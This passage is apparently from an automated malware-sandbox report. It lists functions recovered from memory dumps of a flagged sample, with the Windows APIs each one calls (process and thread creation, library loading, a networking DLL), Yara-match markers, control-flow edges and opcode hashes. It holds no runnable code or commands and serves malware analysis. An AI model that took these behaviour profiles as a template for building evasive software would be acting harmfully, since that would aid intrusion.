                                                                                                                                    • Associated: 00000007.00000002.4135117782.00000000032EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_7_2_3150000_fc.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                    • Opcode ID: a962989777c40848c56c0be561ea57dc9ab3a664edcf4b8d867b28f471246e9e
                                                                                                                                    • Instruction ID: ca2e848b100b8fde3e8dad0434ed15fb8b9c6748eb854a87b7bccbba6e92be8b
                                                                                                                                    • Opcode Fuzzy Hash: a962989777c40848c56c0be561ea57dc9ab3a664edcf4b8d867b28f471246e9e
                                                                                                                                    • Instruction Fuzzy Hash: 6590043530141C43D100F15C4504F470015C7F5301F55D017F0135754DC715CD517531
                                                                                                                                    Function 031C2CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000007.00000002.4135117782.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: true
                                                                                                                                    • Associated: 00000007.00000002.4135117782.0000000003279000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000007.00000002.4135117782.000000000327D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000007.00000002.4135117782.00000000032EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_7_2_3150000_fc.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                    • Opcode ID: d8cfab51c73ec999c2aa58b12a0beeb90649ac686f4274119f79a42eb0835fb7
                                                                                                                                    • Instruction ID: 1c71cecf6bbaa6d5d4c1a94c00abbdaa8430291eebdca9519153e079d4afc112
                                                                                                                                    • Opcode Fuzzy Hash: d8cfab51c73ec999c2aa58b12a0beeb90649ac686f4274119f79a42eb0835fb7
                                                                                                                                    • Instruction Fuzzy Hash: 1290023520141803D100B5985508646001587E5301F55E011A5025555EC76589916131
                                                                                                                                    Function 02A10C88 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 63threadwindowCOMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 420 2a10c88-2a10ca1 421 2a10ca3-2a10ca9 420->421 422 2a10d0a-2a10d22 call 2a2bec0 420->422 421->422 425 2a10c7e-2a10c80 421->425 427 2a10d28-2a10d5a call 2a01410 call 2a21b60 422->427 428 2a10d23 call 2a14460 422->428 425->420 433 2a10d7a-2a10d80 427->433 434 2a10d5c-2a10d6b PostThreadMessageW 427->434 428->427 434->433 435 2a10d6d-2a10d77 434->435 435->433
                                                                                                                                    APIs
                                                                                                                                    • PostThreadMessageW.USER32(0349A-n,00000111,00000000,00000000), ref: 02A10D67
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000007.00000002.4133454064.0000000002A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A00000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_7_2_2a00000_fc.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessagePostThread
                                                                                                                                    • String ID: 0349A-n$0349A-n
                                                                                                                                    • API String ID: 1836367815-3456940251
                                                                                                                                    • Opcode ID: dfa0a338930165ac678ad71770cc00a65904bba8058a009367f9d5d8d809c143
                                                                                                                                    • Instruction ID: ab40d61829fcf75d0890e3498cf02ac92bcdad02b9439a5e8cb5418bae5067d6
                                                                                                                                    • Opcode Fuzzy Hash: dfa0a338930165ac678ad71770cc00a65904bba8058a009367f9d5d8d809c143
                                                                                                                                    • Instruction Fuzzy Hash: 0B112572A402597BDB119BE58C81EEFBB3DAF817A8F048144F9486B101DA355E468BA1
                                                                                                                                    Function 02A10CF0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60threadwindowCOMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 436 2a10cf0-2a10d02 437 2a10d0a-2a10d22 call 2a2bec0 436->437 438 2a10d05 call 2a2b4b0 436->438 441 2a10d28-2a10d5a call 2a01410 call 2a21b60 437->441 442 2a10d23 call 2a14460 437->442 438->437 447 2a10d7a-2a10d80 441->447 448 2a10d5c-2a10d6b PostThreadMessageW 441->448 442->441 448->447 449 2a10d6d-2a10d77 448->449 449->447
                                                                                                                                    APIs
                                                                                                                                    • PostThreadMessageW.USER32(0349A-n,00000111,00000000,00000000), ref: 02A10D67
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000007.00000002.4133454064.0000000002A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A00000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_7_2_2a00000_fc.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessagePostThread
                                                                                                                                    • String ID: 0349A-n$0349A-n
                                                                                                                                    • API String ID: 1836367815-3456940251
                                                                                                                                    • Opcode ID: edc4496dcc0aefe1b98cb30c1f16a78f26252d43de6461ffa0efa680cac9b340
                                                                                                                                    • Instruction ID: 37fd0aa9b8bd9e3336e299a1a92f87502186f9f635e79d82bd702dcbf79e17d0
                                                                                                                                    • Opcode Fuzzy Hash: edc4496dcc0aefe1b98cb30c1f16a78f26252d43de6461ffa0efa680cac9b340
                                                                                                                                    • Instruction Fuzzy Hash: 9C01D6B1D4021C7BEB10ABE48C81EEF7B7DEF41798F048064FA0467140DA795E064BB1
                                                                                                                                    Function 02A10CAC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 53COMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 450 2a10cac-2a10cb8 450->450 451 2a10cba-2a10cbd 450->451 452 2a10d20-2a10d5a call 2a14460 call 2a01410 call 2a21b60 451->452 453 2a10cbf-2a10cc9 451->453 460 2a10d7a-2a10d80 452->460 461 2a10d5c-2a10d6b PostThreadMessageW 452->461 453->452 461->460 462 2a10d6d-2a10d77 461->462 462->460
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000007.00000002.4133454064.0000000002A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A00000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_7_2_2a00000_fc.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: 0349A-n$0349A-n
                                                                                                                                    • API String ID: 0-3456940251
                                                                                                                                    • Opcode ID: cfe7cf1da4da99408f10d77fd98575b04b818501d992f42e07c6c0985285a9b3
                                                                                                                                    • Instruction ID: ddfcd62a42c61db7e4c8ef13475af289c92227a7515c471a056d193a99abc777
                                                                                                                                    • Opcode Fuzzy Hash: cfe7cf1da4da99408f10d77fd98575b04b818501d992f42e07c6c0985285a9b3
                                                                                                                                    • Instruction Fuzzy Hash: 65017BB694124DBE9B109BB94CC0DAF7F7DDE927A8B088051F940D7141DA344D464BB6
                                                                                                                                    Function 02A23A10 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 108sleepCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • Sleep.KERNELBASE(000007D0), ref: 02A23AEB
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000007.00000002.4133454064.0000000002A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A00000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_7_2_2a00000_fc.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Sleep
                                                                                                                                    • String ID: net.dll$wininet.dll
                                                                                                                                    • API String ID: 3472027048-1269752229
                                                                                                                                    • Opcode ID: c758d46a83ccbc2e001e98f9e51144ab6d2e3ec67bde8de0d24d9f42c8a4a20a
                                                                                                                                    • Instruction ID: efb4549b644489069e55fb91a9b0c1c063cf7576daf4c3a270c8314deb79b91a
                                                                                                                                    • Opcode Fuzzy Hash: c758d46a83ccbc2e001e98f9e51144ab6d2e3ec67bde8de0d24d9f42c8a4a20a
                                                                                                                                    • Instruction Fuzzy Hash: 8A3172B1640605BBDB14EF68CC81FEBB7B9FB88704F40455DE61D6B240DB746644CBA4
                                                                                                                                    Function 02A1F429 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 103COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000007.00000002.4133454064.0000000002A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A00000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_7_2_2a00000_fc.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: InitializeUninitialize
                                                                                                                                    • String ID: @J7<
                                                                                                                                    • API String ID: 3442037557-2016760708
                                                                                                                                    • Opcode ID: 6ff67cc44ea29b663d8a00fcdba15c28879c7a63330304db09f29e75e2b87ff3
                                                                                                                                    • Instruction ID: a9d100320f47fc3477a7bebe555d9f884ea3e96013e91db20a58803433603966
                                                                                                                                    • Opcode Fuzzy Hash: 6ff67cc44ea29b663d8a00fcdba15c28879c7a63330304db09f29e75e2b87ff3
                                                                                                                                    • Instruction Fuzzy Hash: 343161B5A0020AAFCB10DFD8D8809EFB7B9FF88314B108559E515E7204DB74EE05CBA0
                                                                                                                                    Function 02A1F430 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 101COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000007.00000002.4133454064.0000000002A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A00000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_7_2_2a00000_fc.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: InitializeUninitialize
                                                                                                                                    • String ID: @J7<
                                                                                                                                    • API String ID: 3442037557-2016760708
                                                                                                                                    • Opcode ID: f3e160a9f1e899d13c39d3ff7a73cf50051c7985fc115966b4742201c8117501
                                                                                                                                    • Instruction ID: 010c3a1ede67cc71b870ac2debcc1bb245d693d3750d119661cc6245edf0175f
                                                                                                                                    • Opcode Fuzzy Hash: f3e160a9f1e899d13c39d3ff7a73cf50051c7985fc115966b4742201c8117501
                                                                                                                                    • Instruction Fuzzy Hash: 9B3130B5A0060AAFDB10DFD8D8809EFB7B9BF88314B108559E515EB214DB75EE058BA0
                                                                                                                                    Function 02A182D0 Relevance: 1.6, APIs: 1, Instructions: 80COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000007.00000002.4133454064.0000000002A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A00000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_7_2_2a00000_fc.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 24206bd2e7392756a88006369877d1835f0d3a6cc93c87b0bb5cd3a1ad5d628b
                                                                                                                                    • Instruction ID: 0d2897d5bd3cdb04c94a27ad1e92d1dd6480a9e361578995b9e4de48935d43af
                                                                                                                                    • Opcode Fuzzy Hash: 24206bd2e7392756a88006369877d1835f0d3a6cc93c87b0bb5cd3a1ad5d628b
                                                                                                                                    • Instruction Fuzzy Hash: ED218E7600DA952FF7269B344D403A2BF6DDB53224B68465CD9F257291CB1AD80B82C1
                                                                                                                                    Function 02A18279 Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • GetFileAttributesW.KERNELBASE(?,00000002,?,?,000004D8,00000000), ref: 02A182AC
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000007.00000002.4133454064.0000000002A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A00000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_7_2_2a00000_fc.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AttributesFile
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3188754299-0
                                                                                                                                    • Opcode ID: ae725d5d1022276922e887530209a410d5b39521f7ed0366200988ba5edd385e
                                                                                                                                    • Instruction ID: 7c83d66aebdb96b5d685293bfac8f31a21b9d3451c41b605be7988c88bb8a9ba
                                                                                                                                    • Opcode Fuzzy Hash: ae725d5d1022276922e887530209a410d5b39521f7ed0366200988ba5edd385e
                                                                                                                                    • Instruction Fuzzy Hash: 8301CB365056441FF724A37C9DC5BA5FB549F0123CF0807A8E9288B2D2EB78C5068280
                                                                                                                                    Function 02A14460 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 02A144D2
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000007.00000002.4133454064.0000000002A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A00000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_7_2_2a00000_fc.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Load
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2234796835-0
                                                                                                                                    • Opcode ID: 398b2a412e78966941bbc00af36c1ba151ff0cffd571e2978ca56ccaa8df4b4d
                                                                                                                                    • Instruction ID: d1c7ff1a96a5b7f36343c1c35e9aa0b32c12495b21cfab972dc534be8b292c0f
                                                                                                                                    • Opcode Fuzzy Hash: 398b2a412e78966941bbc00af36c1ba151ff0cffd571e2978ca56ccaa8df4b4d
                                                                                                                                    • Instruction Fuzzy Hash: CE011EB5D4020DABDF10DBE8DD82F9DB7799B54318F044195EA0897241FA31E7588B91
                                                                                                                                    Function 02A296F0 Relevance: 1.5, APIs: 1, Instructions: 47processCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • CreateProcessInternalW.KERNELBASE(?,?,?,?,02A1823E,00000010,?,?,?,00000044,?,00000010,02A1823E,?,?,?), ref: 02A29753
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000007.00000002.4133454064.0000000002A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A00000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_7_2_2a00000_fc.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CreateInternalProcess
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2186235152-0
                                                                                                                                    • Opcode ID: 016bd8ce1746197e8720e3a876af95e62b55fcc460ffb57a2bf48c7dd99eb0d8
                                                                                                                                    • Instruction ID: c3dcee5533e26a02e077b5e9005ede5761876ed7ac09e843c0440b9ba3d61467
                                                                                                                                    • Opcode Fuzzy Hash: 016bd8ce1746197e8720e3a876af95e62b55fcc460ffb57a2bf48c7dd99eb0d8
                                                                                                                                    • Instruction Fuzzy Hash: 620180B2244108BFCB44DE99DD91EDB77ADAF8C754F518608BA0DE3241D630F8518BA4
                                                                                                                                    Function 02A09CA0 Relevance: 1.5, APIs: 1, Instructions: 38threadCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02A09CE5
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000007.00000002.4133454064.0000000002A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A00000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_7_2_2a00000_fc.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CreateThread
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2422867632-0
                                                                                                                                    • Opcode ID: 81bed8db2255a654e2e4f5805a192615afbdbb60f304de946e01026b61b93252
                                                                                                                                    • Instruction ID: 7188eb1bc4e917fbe1d108de344082230f5d04e9bf2b87634fd259789fdcb5f5
                                                                                                                                    • Opcode Fuzzy Hash: 81bed8db2255a654e2e4f5805a192615afbdbb60f304de946e01026b61b93252
                                                                                                                                    • Instruction Fuzzy Hash: FDF065733C021436E22075ADAD52FD7769DDB80B75F540426FB1CEB2C1DD92B44146A4
                                                                                                                                    Function 02A09C9A Relevance: 1.5, APIs: 1, Instructions: 34threadCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02A09CE5
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000007.00000002.4133454064.0000000002A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A00000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_7_2_2a00000_fc.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CreateThread
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2422867632-0
                                                                                                                                    • Opcode ID: 55c12ee0478bd197b30b76699c9a20714714125b54a48bb0ad2dbbf9c5c8d5a6
                                                                                                                                    • Instruction ID: c66754513af0a43aa338e8236e590721ca73503b33a79a3ce001b7de7c095991
                                                                                                                                    • Opcode Fuzzy Hash: 55c12ee0478bd197b30b76699c9a20714714125b54a48bb0ad2dbbf9c5c8d5a6
                                                                                                                                    • Instruction Fuzzy Hash: 3BF0ED722C070437E220B299DD82FC7769CDF80B60F140019FB0CAB2C1DAA6B4418BA4
                                                                                                                                    Function 02A29610 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • RtlAllocateHeap.NTDLL(02A11969,?,02A25DDF,02A11969,02A255FF,02A25DDF,?,02A11969,02A255FF,00001000,?,?,00000000), ref: 02A2964C
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000007.00000002.4133454064.0000000002A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A00000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_7_2_2a00000_fc.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AllocateHeap
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1279760036-0
                                                                                                                                    • Opcode ID: 7b7813cea5ecf29619ebb5f332fdfad85baad263fae7f034d9bc4f129238223b
                                                                                                                                    • Instruction ID: 4432612774913807faf30d29a1d6810c3916686ce5f38b8d95eef19adb87c3f8
                                                                                                                                    • Opcode Fuzzy Hash: 7b7813cea5ecf29619ebb5f332fdfad85baad263fae7f034d9bc4f129238223b
                                                                                                                                    • Instruction Fuzzy Hash: 03E065B22402087BDA10EE58DC81F9B37ADEF88710F004008FA0CA7241DA75B8148AB8
                                                                                                                                    Function 02A29660 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • RtlFreeHeap.NTDLL(00000000,00000004,00000000,D0A2AFD0,00000007,00000000,00000004,00000000,02A13D3E,000000F4), ref: 02A2969C
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000007.00000002.4133454064.0000000002A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A00000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_7_2_2a00000_fc.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: FreeHeap
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3298025750-0
                                                                                                                                    • Opcode ID: 2c7d0e8fa14e5537e8920ab20e4117eb7134f7dcb1150b0d78b0cb26355729ad
                                                                                                                                    • Instruction ID: a4238e0991a69bf6a1b6baeff84002e68fbbf59bc6c8dcd8de7ba991ad4abf4f
                                                                                                                                    • Opcode Fuzzy Hash: 2c7d0e8fa14e5537e8920ab20e4117eb7134f7dcb1150b0d78b0cb26355729ad
                                                                                                                                    • Instruction Fuzzy Hash: 57E065B22402047BD610EE59DC44FAB33ADEF88750F004419F90DA7242DB70BD118BB4
                                                                                                                                    Function 02A14453 Relevance: 1.5, APIs: 1, Instructions: 29libraryloaderCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 02A144D2
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000007.00000002.4133454064.0000000002A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A00000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_7_2_2a00000_fc.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Load
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2234796835-0
                                                                                                                                    • Opcode ID: 8aef7e6dee978ff0a08f23e338e06f373b0ad360bf5dbdfaa9cc84fad5eece04
                                                                                                                                    • Instruction ID: a46cceca04224e933ddd498bf3f1fb1722d711a9f235d354a94c4737bdf96f5e
                                                                                                                                    • Opcode Fuzzy Hash: 8aef7e6dee978ff0a08f23e338e06f373b0ad360bf5dbdfaa9cc84fad5eece04
                                                                                                                                    • Instruction Fuzzy Hash: 1DF0A0F6E40109ABCB10CBD8DC82FADB7759F08318F008185E5089A280FA35E709CF51
                                                                                                                                    Function 02A18280 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • GetFileAttributesW.KERNELBASE(?,00000002,?,?,000004D8,00000000), ref: 02A182AC
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000007.00000002.4133454064.0000000002A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A00000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_7_2_2a00000_fc.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AttributesFile
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3188754299-0
                                                                                                                                    • Opcode ID: 5a49965b76113d7eba8950a62bf73d699cb455ede4163327e3b47103c27001a1
                                                                                                                                    • Instruction ID: 4f84d1057b4c55c49d474dca2b1b21a8aa816cd2f1576ac0c59d4b238e155ff8
                                                                                                                                    • Opcode Fuzzy Hash: 5a49965b76113d7eba8950a62bf73d699cb455ede4163327e3b47103c27001a1
                                                                                                                                    • Instruction Fuzzy Hash: F5E026352406082BFB286BACDD81FA2335C9B48738F480660BD3CCB2C2EA7CF8014190
                                                                                                                                    Function 02A18069 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • SetErrorMode.KERNELBASE(00008003,?,?,02A11C70,02A27F3E,02A255FF,02A11C36), ref: 02A180A3
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000007.00000002.4133454064.0000000002A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A00000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_7_2_2a00000_fc.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ErrorMode
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2340568224-0
                                                                                                                                    • Opcode ID: 41c98a09423e25b3d80bc38189e147eb8eba39a4a8001bd81624460b1773707e
                                                                                                                                    • Instruction ID: f59f670476075384d8bcc90204d3eb8036f18066b300fda58921a98050280590
                                                                                                                                    • Opcode Fuzzy Hash: 41c98a09423e25b3d80bc38189e147eb8eba39a4a8001bd81624460b1773707e
                                                                                                                                    • Instruction Fuzzy Hash: 28E0C2716802086FFA20EBF8EC63FE5325D5B40364F044464B90CE72C2EE76A4518A65
                                                                                                                                    Function 02A18070 Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • SetErrorMode.KERNELBASE(00008003,?,?,02A11C70,02A27F3E,02A255FF,02A11C36), ref: 02A180A3
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000007.00000002.4133454064.0000000002A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A00000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_7_2_2a00000_fc.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ErrorMode
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2340568224-0
                                                                                                                                    • Opcode ID: 1881ecda90284090cb91987cf95af106e8e22d83d3344d8cc80dfc5dee4a4a96
                                                                                                                                    • Instruction ID: 99d53b1e8645fc4cebb009fb91b9967cf59f01398b4ff029fda32b0c6f03ae49
                                                                                                                                    • Opcode Fuzzy Hash: 1881ecda90284090cb91987cf95af106e8e22d83d3344d8cc80dfc5dee4a4a96
                                                                                                                                    • Instruction Fuzzy Hash: 85D05E712803083BF610B6E9DD56F96328D5B00764F444464BA0CE72C2EE66F05045A9
                                                                                                                                    Function 031C2C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000007.00000002.4135117782.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: true
                                                                                                                                    • Associated: 00000007.00000002.4135117782.0000000003279000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000007.00000002.4135117782.000000000327D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000007.00000002.4135117782.00000000032EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_7_2_3150000_fc.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                    • Opcode ID: e9d4b39158139bdef385a84d0d9c12803c821864f089a2279879d7a2c815813e
                                                                                                                                    • Instruction ID: d9e208d3e2955e844e80399b110cdf7375adca1df5ea6be22c839a672f970029
                                                                                                                                    • Opcode Fuzzy Hash: e9d4b39158139bdef385a84d0d9c12803c821864f089a2279879d7a2c815813e
                                                                                                                                    • Instruction Fuzzy Hash: D5B09B719015D5C7DE11E7604708717791467D5701F29C465D2030641E4739C5D1E175

                                                                                                                                    Non-executed Functions

                                                                                                                                    Function 030904DE Relevance: .1, Instructions: 149COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000007.00000002.4135061035.0000000003090000.00000040.00000800.00020000.00000000.sdmp, Offset: 03090000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_7_2_3090000_fc.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 025498aec11dcda84dc733139c27437218ec7e81399a40a62fefcf4651d99b5c
                                                                                                                                    • Instruction ID: 7bd72073a9434e569309cfb12e839f8a5909ae7854e7b06ea6af797d8fc3d897
                                                                                                                                    • Opcode Fuzzy Hash: 025498aec11dcda84dc733139c27437218ec7e81399a40a62fefcf4651d99b5c
                                                                                                                                    • Instruction Fuzzy Hash: 6541F97561AB0D4FE768EF6CD0816B7B3E1FB89300F50052ED88AC3652E774E8468745
                                                                                                                                    Function 0309DCE0 Relevance: 56.5, Strings: 45, Instructions: 223COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000007.00000002.4135061035.0000000003090000.00000040.00000800.00020000.00000000.sdmp, Offset: 03090000, based on PE: false
